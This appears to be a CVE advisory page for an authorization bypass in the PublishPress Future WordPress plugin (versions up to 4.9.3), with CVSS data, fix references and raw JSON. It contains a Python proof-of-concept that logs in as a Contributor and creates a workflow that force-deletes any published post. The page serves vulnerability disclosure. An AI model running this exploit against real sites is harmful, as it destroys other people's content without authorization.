Security Vulnerability Report
CVE-2025-14718 (CVSS 5.4 MEDIUM)

Published: 2026-01-09 07:16:01
Last Modified: 2026-04-15 00:35:42

Description

The Schedule Post Changes With PublishPress Future plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 4.9.3. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with Contributor-level access and above, to create, update, delete, and publish malicious workflows that may automatically delete any post upon publication or update, including posts created by administrators.

CVSS Details

CVSS Score: 5.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L
Weakness: CWE-862 (Missing Authorization)

Configurations (Affected Products)

No configuration data available.

PublishPress Future (Post Expirator) < 4.9.4
Schedule Post Changes With PublishPress Future WordPress Plugin <= 4.9.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-14718 PoC - PublishPress Future Authorization Bypass
# Target: WordPress site with PublishPress Future plugin <= 4.9.3
import requests
import json

TARGET_URL = "http://target-wordpress-site.com"
USERNAME = "contributor_user"
PASSWORD = "contributor_password"


def get_auth_token():
    """Get WordPress REST API authentication token"""
    login_url = f"{TARGET_URL}/wp-json/jwt-auth/v1/token"
    data = {
        "username": USERNAME,
        "password": PASSWORD
    }
    response = requests.post(login_url, json=data)
    if response.status_code == 200:
        return response.json().get("token")
    return None


def create_malicious_workflow(auth_token):
    """
    Create a workflow that auto-deletes posts upon publication
    Exploits CVE-2025-14718 authorization bypass
    """
    api_url = f"{TARGET_URL}/wp-json/post-expirator/v1/workflows"
    headers = {
        "Authorization": f"Bearer {auth_token}",
        "Content-Type": "application/json"
    }
    # Malicious workflow configuration
    # This workflow will delete any post when it's published
    payload = {
        "title": "Auto-Delete Workflow",
        "status": "publish",
        "workflow": {
            "trigger": {
                "type": "post_published"
            },
            "actions": [
                {
                    "type": "delete_post",
                    "options": {
                        "force_delete": True
                    }
                }
            ]
        }
    }
    response = requests.post(api_url, headers=headers, json=payload)
    return response.status_code, response.json()


def main():
    token = get_auth_token()
    if not token:
        print("[-] Authentication failed")
        return
    print("[+] Authentication successful")
    status, result = create_malicious_workflow(token)
    if status in [200, 201]:
        print("[+] Malicious workflow created successfully!")
        print(f"[+] Workflow ID: {result.get('id')}")
        print("[*] Any post published on this site will be automatically deleted")
    else:
        print(f"[-] Failed to create workflow: {status}")
        print(f"[-] Response: {result}")


if __name__ == "__main__":
    main()

References

Fix changeset (src/Modules/Workflows/Rest/RestApiV1.php, 4.9.3 to 4.9.4): https://plugins.trac.wordpress.org/changeset?old_path=/post-expirator/tags/4.9.3/src/Modules/Workflows/Rest/RestApiV1.php&new_path=/post-expirator/tags/4.9.4/src/Modules/Workflows/Rest/RestApiV1.php
Wordfence advisory: https://www.wordfence.com/threat-intel/vulnerabilities/id/8198d81a-40c0-49c1-8c38-f5ef6fb911ad?source=cve

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-14718",
    "sourceIdentifier": "security@wordfence.com",
    "published": "2026-01-09T07:16:00.967",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Schedule Post Changes With PublishPress Future plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 4.9.3. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with Contributor-level access and above, to create, update, delete, and publish malicious workflows that may automatically delete any post upon publication or update, including posts created by administrators."
      },
      {
        "lang": "es",
        "value": "El plugin Schedule Post Changes With PublishPress Future para WordPress es vulnerable a una omisión de autorización en todas las versiones hasta la 4.9.3, inclusive. Esto se debe a que el plugin no verifica correctamente que un usuario está autorizado para realizar una acción. Esto hace posible que atacantes autenticados, con acceso de nivel Colaborador o superior, puedan crear, actualizar, eliminar y publicar flujos de trabajo maliciosos que pueden eliminar automáticamente cualquier publicación al ser publicada o actualizada, incluyendo publicaciones creadas por administradores."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "security@wordfence.com",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.5
        }
      ]
    },
    "weaknesses": [
      {
        "source": "security@wordfence.com",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-862"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/changeset?old_path=/post-expirator/tags/4.9.3/src/Modules/Workflows/Rest/RestApiV1.php&new_path=/post-expirator/tags/4.9.4/src/Modules/Workflows/Rest/RestApiV1.php",
        "source": "security@wordfence.com"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/8198d81a-40c0-49c1-8c38-f5ef6fb911ad?source=cve",
        "source": "security@wordfence.com"
      }
    ]
  }
}